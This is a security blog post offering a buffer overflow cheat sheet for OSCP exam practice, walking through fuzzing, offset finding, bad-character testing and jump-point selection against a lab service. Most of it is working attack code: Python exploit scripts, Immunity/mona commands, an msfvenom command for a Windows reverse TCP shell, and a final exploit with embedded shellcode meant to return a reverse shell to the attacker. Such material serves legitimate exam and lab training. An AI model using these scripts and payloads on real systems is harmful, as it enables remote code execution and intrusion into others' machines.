Muzec's Cyber Security Blog

Hack. Sleep. Repeat

View on GitHub

Image

Buffer Overflow Cheat Sheet, Simple Method To Follow For Your OSCP Exams……

CONFIRMING VULNERABLE-APPS TO MAKE SURE SHELL CONNECTION IS ACTIVE, TEST THE FUNCTION FOR BUFFER STORING:-

nc <target_ip> <port>

FUZZING

#!/usr/bin/env python3

import socket, time, sys

ip = "10.10.201.115"

port = 1337
timeout = 5
prefix = "OVERFLOW1 "

string = prefix + "A" * 100

while True:
  try:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
      s.settimeout(timeout)
      s.connect((ip, port))
      s.recv(1024)
      print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
      s.send(bytes(string, "latin-1"))
      s.recv(1024)
  except:
    print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
    sys.exit(0)
  string += 100 * "A"
  time.sleep(1)

USING PATTERN_CREATE.rb WITH THE BYTES OUTPUT FROM FUZZER FOR CRASH REPLICATION & CONTROLLING EIP:-

image

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000

import socket

ip = "10.10.136.142"
port = 1337

prefix = "OVERFLOW1 "
offset = 0
overflow = "A" * offset
retn = ""
padding = ""
payload = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq"
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
  s.connect((ip, port))
  print("Sending evil buffer...")
  s.send(bytes(buffer + "\r\n", "latin-1"))
  print("Done!")
except:
  print("Could not connect.")

!mona findmsp -distance 3000

import socket

ip = "10.10.136.142"
port = 1337

prefix = "OVERFLOW1 "
offset = 314
overflow = "A" * offset
retn = "BBBB"
padding = ""
payload = ""
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
  s.connect((ip, port))
  print("Sending evil buffer...")
  s.send(bytes(buffer + "\r\n", "latin-1"))
  print("Done!")
except:
  print("Could not connect.")

FINDING BAD CHARACTERS

Let Create a working Directory First

!mona config -set workingfolder c:\mona\%p
!mona bytearray -b "\x00"

Now generate a string of bad chars that is identical to the bytearray. The following python script can be used to generate a string of bad chars from \x01 to \xff;

for x in range(1, 256):
  print("\\x" + "{:02x}".format(x), end='')
print()

image

import socket

ip = "10.10.136.142"
port = 1337

prefix = "OVERFLOW1 "
offset = 314
overflow = "A" * offset
retn = "BBBB"
padding = ""
payload = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
  s.connect((ip, port))
  print("Sending evil buffer...")
  s.send(bytes(buffer + "\r\n", "latin-1"))
  print("Done!")
except:
  print("Could not connect.")

!mona compare -f C:\mona\oscp\bytearray.bin -a < ESP-address>

A popup window should appear labelled “mona Memory comparison results”. If not, use the Window menu to switch to it. The window shows the results of the comparison, indicating any characters that are different in memory to what they are in the generated bytearray.bin file.

Not all of these might be badchars! Sometimes badchars cause the next byte to get corrupted as well, or even effect the rest of the string.

The first badchar in the list should be the null byte (\x00) since we already removed it from the file. Make a note of any others.

FINDING A JUMP POINT:-

!mona jmp -r esp -cpb "\x00\x16\x2f\xf4\xfd"

This command finds all “jmp esp” (or equivalent) instructions with addresses that don’t contain any of the badchars specified.

Image

Now setting the “retn” variable to the address, written backwards (since the system is little endian). For example if the address is \x01\x02\x03\x04 in Immunity, write it as \x04\x03\x02\x01 in your exploit.

GENERATE PAYLOAD:-

msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 EXITFUNC=thread -b "x00\x16\x2f\xf4\xfd" -f py

Image

PREPEND NOPS:-

Since an encoder was likely used to generate the payload, you will need some space in memory for the payload to unpack itself. You can do this by setting the padding variable to a string of 16 or more “No Operation” (\x90) bytes:

padding = "\x90" * 16

OUR FINAL EXPLOIT!

#!/usr/bin/env python2
import socket

RHOST = "10.10.136.142"
RPORT = 1337

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((RHOST, RPORT))

buf = ""
buf += "OVERFLOW5 "
buf += "A" * 314 + b"\xaf\x11\x50\x62" + "\x90" * 16
buf += b"\xfc\xbb\x8c\xdf\xd9\x41\xeb\x0c\x5e\x56\x31\x1e\xad"
buf += b"\x01\xc3\x85\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x70"
buf += b"\x37\x5b\x41\x88\xc8\x3c\xcb\x6d\xf9\x7c\xaf\xe6\xaa"
buf += b"\x4c\xbb\xaa\x46\x26\xe9\x5e\xdc\x4a\x26\x51\x55\xe0"
buf += b"\x10\x5c\x66\x59\x60\xff\xe4\xa0\xb5\xdf\xd5\x6a\xc8"
buf += b"\x1e\x11\x96\x21\x72\xca\xdc\x94\x62\x7f\xa8\x24\x09"
buf += b"\x33\x3c\x2d\xee\x84\x3f\x1c\xa1\x9f\x19\xbe\x40\x73"
buf += b"\x12\xf7\x5a\x90\x1f\x41\xd1\x62\xeb\x50\x33\xbb\x14"
buf += b"\xfe\x7a\x73\xe7\xfe\xbb\xb4\x18\x75\xb5\xc6\xa5\x8e"
buf += b"\x02\xb4\x71\x1a\x90\x1e\xf1\xbc\x7c\x9e\xd6\x5b\xf7"
buf += b"\xac\x93\x28\x5f\xb1\x22\xfc\xd4\xcd\xaf\x03\x3a\x44"
buf += b"\xeb\x27\x9e\x0c\xaf\x46\x87\xe8\x1e\x76\xd7\x52\xfe"
buf += b"\xd2\x9c\x7f\xeb\x6e\xff\x17\xd8\x42\xff\xe7\x76\xd4"
buf += b"\x8c\xd5\xd9\x4e\x1a\x56\x91\x48\xdd\x99\x88\x2d\x71"
buf += b"\x64\x33\x4e\x58\xa3\x67\x1e\xf2\x02\x08\xf5\x02\xaa"
buf += b"\xdd\x5a\x52\x04\x8e\x1a\x02\xe4\x7e\xf3\x48\xeb\xa1"
buf += b"\xe3\x73\x21\xca\x8e\x8e\xa2\xff\x46\x90\xae\x68\x55"
buf += b"\x90\xdf\x34\xd0\x76\xb5\xd4\xb4\x21\x22\x4c\x9d\xb9"
buf += b"\xd3\x91\x0b\xc4\xd4\x1a\xb8\x39\x9a\xea\xb5\x29\x4b"
buf += b"\x1b\x80\x13\xda\x24\x3e\x3b\x80\xb7\xa5\xbb\xcf\xab"
buf += b"\x71\xec\x98\x1a\x88\x78\x35\x04\x22\x9e\xc4\xd0\x0d"
buf += b"\x1a\x13\x21\x93\xa3\xd6\x1d\xb7\xb3\x2e\x9d\xf3\xe7"
buf += b"\xfe\xc8\xad\x51\xb9\xa2\x1f\x0b\x13\x18\xf6\xdb\xe2"
buf += b"\x52\xc9\x9d\xea\xbe\xbf\x41\x5a\x17\x86\x7e\x53\xff"
buf += b"\x0e\x07\x89\x9f\xf1\xd2\x09\xbf\x13\xf6\x67\x28\x8a"
buf += b"\x93\xc5\x35\x2d\x4e\x09\x40\xae\x7a\xf2\xb7\xae\x0f"
buf += b"\xf7\xfc\x68\xfc\x85\x6d\x1d\x02\x39\x8d\x34\x02\xbd"
buf += b"\x71\xb7"
buf += "\n"

s.send(buf)

NOTE:- Are You Confuse How i Got The "\xaf\x11\x50\x62" I Change One Of The Pointer I Got 625011AF To Be Written Backwards And Why Is That?? Because The System Is Little Endian.

If we have everything correct running the exploit should give us a reverse shell back to our ncat listner.

image

Some Intersting Buffer Overflow Challenges To Try Out;-

  1. Buffer Overflow Prep:
  2. Brainpan 1:
  3. Vulnserver:
  4. Gatekeeper:

Greeting From Muzec



Back To Home